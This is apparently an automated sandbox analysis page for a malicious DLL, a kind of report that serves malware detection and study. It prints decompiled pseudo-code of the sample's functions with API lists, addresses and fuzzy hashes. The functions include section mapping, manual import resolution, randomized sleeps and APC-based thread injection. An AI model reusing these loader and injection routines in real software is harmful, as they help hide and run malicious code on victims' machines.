nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E191B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E191EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e191ba5
0x6e191bac
0x6e191bad
0x6e191bae
0x6e191baf
0x6e191bb0
0x6e191bc1
0x6e191bc5
0x6e191bd9
0x6e191bdc
0x6e191bdf
0x6e191be6
0x6e191be9
0x6e191bf0
0x6e191bf3
0x6e191bf6
0x6e191bf9
0x6e191bfe
0x6e191c39
0x6e191c00
0x6e191c03
0x6e191c09
0x6e191c0e
0x6e191c12
0x6e191c30
0x6e191c14
0x6e191c1b
0x6e191c29
0x6e191c29
0x6e191c12
0x6e191c41

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E191BF9

Part of subcall function 6E191EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,6E191C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E191C0E,?), ref: 6E191EF4

memset.NTDLL ref: 6E191C1B

Strings

@, xrefs: 6E191BE9

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: 6615f27af0e400e124763947e8776efa4f656a6a6fba860df300d9abb531ccb0
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: 97210BB1E0020DAFDB01CFE9C8849DEFBB9EB48354F514829E515F3210D735AA899B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E191E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E191E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6e191e8e
0x6e191e9f
0x6e191ea7
0x6e191ea9
0x6e191ebc
0x6e191ebc
0x6e191ec6

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E191B27,?,6E191CE6,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191E9F
GetSystemDefaultUILanguage.KERNEL32(?,?,6E191B27,?,6E191CE6,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191EA9
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E191B27,?,6E191CE6,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191EBC

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 9929bb0a8362cc97cb4edbeb974460eb8592de43b2c0486c6dfbcfb453077fdc
Instruction ID: 3c8f39469faac49c09b78dc80a3ea016805b0d673b960d7e218415857e50606f
Opcode Fuzzy Hash: 9929bb0a8362cc97cb4edbeb974460eb8592de43b2c0486c6dfbcfb453077fdc
Instruction Fuzzy Hash: 51E04F68640209F6EB00E7A18C0AFBE72BCAB0070AF504084FB11E60C0D7B49E49B769

Uniqueness

Uniqueness Score: -1.00%

Function 6E191F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E191F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e1941cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e191f7c
0x6e191f85
0x6e191f8a
0x6e191f90
0x6e191f99
0x6e191f9f
0x6e191fa1
0x6e191fa4
0x6e191fa9
0x6e191fb0
0x6e191fb0
0x6e191fb4
0x6e191fbc
0x6e191fbf
0x00000000
0x00000000
0x6e191fc5
0x6e191fcf
0x6e191fd1
0x6e191fd4
0x6e191fd7
0x6e191fdb
0x6e191fe3
0x6e191fe5
0x6e191fe8
0x6e192050
0x6e192050
0x6e192054
0x00000000
0x00000000
0x6e191fed
0x6e191ff3
0x6e191ff5
0x6e192008
0x6e19200b
0x6e19200b
0x6e19200b
0x6e19200f
0x6e191ff7
0x6e191ff7
0x6e191fff
0x6e192001
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192001
0x6e191fef
0x6e191fef
0x6e192003
0x6e192003
0x6e192003
0x6e192012
0x6e192015
0x6e192017
0x6e19201e
0x6e192019
0x6e192019
0x6e192019
0x6e192026
0x6e19202c
0x6e19202e
0x6e19205e
0x6e192030
0x6e192030
0x6e192033
0x6e192035
0x6e19203d
0x6e19203d
0x6e192042
0x6e192044
0x6e19204b
0x6e19204d
0x6e19204d
0x6e19204d
0x00000000
0x6e19204d
0x00000000
0x6e19202e
0x6e191fdd
0x6e191fdf
0x6e191fe1
0x00000000
0x00000000
0x6e191fe1
0x6e192061
0x6e192061
0x6e192068
0x6e19206d
0x00000000
0x00000000
0x6e192073
0x6e19207e
0x00000000
0x6e19207e
0x6e192075
0x6e192075
0x6e19207b
0x00000000
0x6e19207b
0x6e191fa9
0x6e19207f
0x6e192084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E191FB4
GetProcAddress.KERNEL32(?,00000000), ref: 6E192026

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 86ccf36f80f845eda8f15e0baedbb9374a2ad1ff4dfc184cafec3de47345e4ba
Instruction ID: 6e053bdd67d20416ca4394ce78fbd992688bc00298f6efc183792bab3e7b108e
Opcode Fuzzy Hash: 86ccf36f80f845eda8f15e0baedbb9374a2ad1ff4dfc184cafec3de47345e4ba
Instruction Fuzzy Hash: 58313871A0020ADFEB50CF99D894AAEB7F8FF15300B29406AD815E7344E774DA85FB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E191EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E191EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e191ed9
0x6e191edf
0x6e191eed
0x6e191ef4
0x6e191ef9
0x6e191eff
0x00000000
0x6e191f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6E191C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E191C0E,?), ref: 6E191EF4

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 638a0ace2254a6358bd6308323917ae38977f5ad08a8f00acfabbaa7c64d5dbe
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 3BF01CB6A0420CBFEB119FA9CC85C9FBBBDEB44394B104939B552E1190D6309E4C9A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E191C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E191C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6E191F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6E1918AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6E191ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E1913D1(E6E1914E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E19134F(_t45,  &_v48) != 0) {
					 *0x6e1941b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e1941b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E191B58(_t50 + _t15);
				 *0x6e1941b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E19142F(_t44);
					goto L11;
				}
			}

0x6e191c89
0x6e191c92
0x6e191c96
0x6e191d9e
0x6e191da4
0x00000000
0x00000000
0x00000000
0x6e191c9c
0x6e191c9c
0x6e191ca1
0x6e191ca7
0x6e191cb6
0x6e191cb7
0x6e191cba
0x6e191cbd
0x6e191cc6
0x6e191cca
0x6e191cd0
0x6e191cd4
0x6e191cdb
0x00000000
0x00000000
0x6e191ce1
0x6e191ce8
0x6e191cec
0x6e191d8f
0x6e191d8f
0x6e191d96
0x6e191d98
0x6e191d98
0x00000000
0x6e191d96
0x6e191cf5
0x6e191d48
0x6e191d48
0x6e191d59
0x6e191d5d
0x6e191d8b
0x6e191d5f
0x6e191d62
0x6e191d6a
0x6e191d6e
0x6e191d76
0x6e191d76
0x6e191d7d
0x6e191d7d
0x00000000
0x6e191d5d
0x6e191d03
0x6e191d42
0x00000000
0x6e191d42
0x6e191d05
0x6e191d09
0x6e191d12
0x6e191d14
0x6e191d18
0x6e191d3a
0x6e191d3a
0x00000000
0x6e191d3a
0x6e191d1a
0x6e191d1f
0x6e191d26
0x6e191d2b
0x00000000
0x6e191d2d
0x6e191d30
0x6e191d33
0x00000000
0x6e191d33

APIs

Part of subcall function 6E191F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E191C8E,74B063F0,00000000), ref: 6E191F1F
Part of subcall function 6E191F10: GetVersion.KERNEL32 ref: 6E191F2E
Part of subcall function 6E191F10: GetCurrentProcessId.KERNEL32 ref: 6E191F3D
Part of subcall function 6E191F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E191F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E191CA1
SwitchToThread.KERNEL32 ref: 6E191CA7

Part of subcall function 6E1918AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E191903
Part of subcall function 6E1918AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1919C9

Sleep.KERNELBASE(00000000,00000000), ref: 6E191CCA
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E191D12
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E191D30
WaitForSingleObject.KERNEL32(00000000,000000FF,6E1914E8,?,00000000), ref: 6E191D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E191D76
CloseHandle.KERNEL32(00000000), ref: 6E191D7D
GetLastError.KERNEL32(6E1914E8,?,00000000), ref: 6E191D85
GetLastError.KERNEL32 ref: 6E191D98

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 78cfe8b6c496dc7b74796a16ea69a00d58cadb8ca6f9cc44906f6094e9f32c0d
Instruction ID: 5db43d63667323e58c4a33b68e20a234e5f012c614ad3efccedaa8ae39c3b9e3
Opcode Fuzzy Hash: 78cfe8b6c496dc7b74796a16ea69a00d58cadb8ca6f9cc44906f6094e9f32c0d
Instruction Fuzzy Hash: 2431A3756087019BC750DFE5884C99F76FDBB96754B22492AF8A4C3180EB30C9C9B7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E191060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E191060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E191B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e1941d0 + 0x6e195014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e1941d0 + 0x6e1950e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E19142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e1941d0 + 0x6e1950f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e1941d0 + 0x6e195104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e1941d0 + 0x6e195119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e1941d0 + 0x6e19512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E191B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e19106e
0x6e191072
0x6e191133
0x6e191078
0x6e191090
0x6e19109f
0x6e1910a6
0x6e1910aa
0x6e1910ad
0x6e19112b
0x6e19112c
0x6e1910af
0x6e1910bc
0x6e1910c0
0x6e1910c3
0x00000000
0x6e1910c5
0x6e1910d2
0x6e1910d6
0x6e1910d9
0x00000000
0x6e1910db
0x6e1910e8
0x6e1910ec
0x6e1910ef
0x00000000
0x6e1910f1
0x6e1910fe
0x6e191102
0x6e191105
0x00000000
0x6e191107
0x6e19110d
0x6e191113
0x6e191118
0x6e19111f
0x6e191122
0x00000000
0x6e191124
0x6e191127
0x6e191127
0x6e191122
0x6e191105
0x6e1910ef
0x6e1910d9
0x6e1910c3
0x6e1910ad
0x6e191141

APIs

Part of subcall function 6E191B58: HeapAlloc.KERNEL32(00000000,?,6E191702,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191B64

GetModuleHandleA.KERNEL32(?,00000020), ref: 6E191084
GetProcAddress.KERNEL32(00000000,?), ref: 6E1910A6
GetProcAddress.KERNEL32(00000000,?), ref: 6E1910BC
GetProcAddress.KERNEL32(00000000,?), ref: 6E1910D2
GetProcAddress.KERNEL32(00000000,?), ref: 6E1910E8
GetProcAddress.KERNEL32(00000000,?), ref: 6E1910FE

Part of subcall function 6E191B9C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E191BF9
Part of subcall function 6E191B9C: memset.NTDLL ref: 6E191C1B

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: b44c9ba7745f834fc7ce5b189be1b15f188426ee390d0703b8150afd1a553b39
Instruction ID: f977fa91e53e656ea9d5a378f920b72318e9b9316668ef0788302dfb9de8c881
Opcode Fuzzy Hash: b44c9ba7745f834fc7ce5b189be1b15f188426ee390d0703b8150afd1a553b39
Instruction Fuzzy Hash: 89214FB160060AAFDB40EFA9DCC0D9A7BFCFB55248B124435E955E7211E730E986FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E191DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e194188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e19418c;
						if( *0x6e19418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e194198;
								if( *0x6e194198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e19418c);
						}
						HeapDestroy( *0x6e194190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e194188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e194190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e1941b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1913D1(E6E1920CE, E6E19121C(_a12, 1, 0x6e194198, _t41));
							 *0x6e19418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e191db1
0x6e191dbd
0x6e191dbf
0x6e191dc2
0x6e191e38
0x6e191e3e
0x6e191e40
0x6e191e42
0x6e191e48
0x6e191e4a
0x6e191e4f
0x6e191e52
0x6e191e5d
0x6e191e5f
0x00000000
0x00000000
0x6e191e61
0x6e191e64
0x6e191e66
0x00000000
0x00000000
0x00000000
0x6e191e66
0x6e191e6e
0x6e191e6e
0x6e191e7a
0x6e191e7a
0x6e191dc4
0x6e191dc5
0x6e191de5
0x6e191deb
0x6e191ded
0x6e191df2
0x6e191e2e
0x6e191e2e
0x6e191df4
0x6e191dfc
0x6e191e03
0x6e191e0d
0x6e191e19
0x6e191e20
0x6e191e25
0x6e191e2a
0x00000000
0x6e191e2a
0x6e191e25
0x6e191df2
0x6e191dc5
0x6e191e87

APIs

InterlockedIncrement.KERNEL32(6E194188), ref: 6E191DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E191DE5

Part of subcall function 6E1913D1: CreateThread.KERNELBASE ref: 6E1913E8
Part of subcall function 6E1913D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1913FD
Part of subcall function 6E1913D1: GetLastError.KERNEL32(00000000), ref: 6E191408
Part of subcall function 6E1913D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E191412
Part of subcall function 6E1913D1: CloseHandle.KERNEL32(00000000), ref: 6E191419
Part of subcall function 6E1913D1: SetLastError.KERNEL32(00000000), ref: 6E191422

InterlockedDecrement.KERNEL32(6E194188), ref: 6E191E38
SleepEx.KERNEL32(00000064,00000001), ref: 6E191E52
CloseHandle.KERNEL32 ref: 6E191E6E
HeapDestroy.KERNEL32 ref: 6E191E7A

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 674ff2024140b7d7d16a8c8be3eea0fbe9927d87c26026545788037d5467aa36
Instruction ID: e3f65e9c015643d52b76a4cc386c52fa04f93835693b174ebcaa54d7ffb9c1da
Opcode Fuzzy Hash: 674ff2024140b7d7d16a8c8be3eea0fbe9927d87c26026545788037d5467aa36
Instruction Fuzzy Hash: 8821A135700605ABDB019FF9D888A4E7BACF7667A47228535F529D3240E330ADC6FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1913D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1913D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1941cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1913e8
0x6e1913ee
0x6e1913f2
0x6e1913fd
0x6e191405
0x6e19140e
0x6e191412
0x6e191419
0x6e191420
0x6e191422
0x6e191428
0x6e191405
0x6e19142c

APIs

CreateThread.KERNELBASE ref: 6E1913E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1913FD
GetLastError.KERNEL32(00000000), ref: 6E191408
TerminateThread.KERNEL32(00000000,00000000), ref: 6E191412
CloseHandle.KERNEL32(00000000), ref: 6E191419
SetLastError.KERNEL32(00000000), ref: 6E191422

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: d344578556c08189a5f5ad3491aa9451239c24cb33cfa83e5c5f531fc7db1e92
Instruction ID: a06381804095be9e416e343bc206608ef2b4193ad7ba6c58f3eec16ca858e119
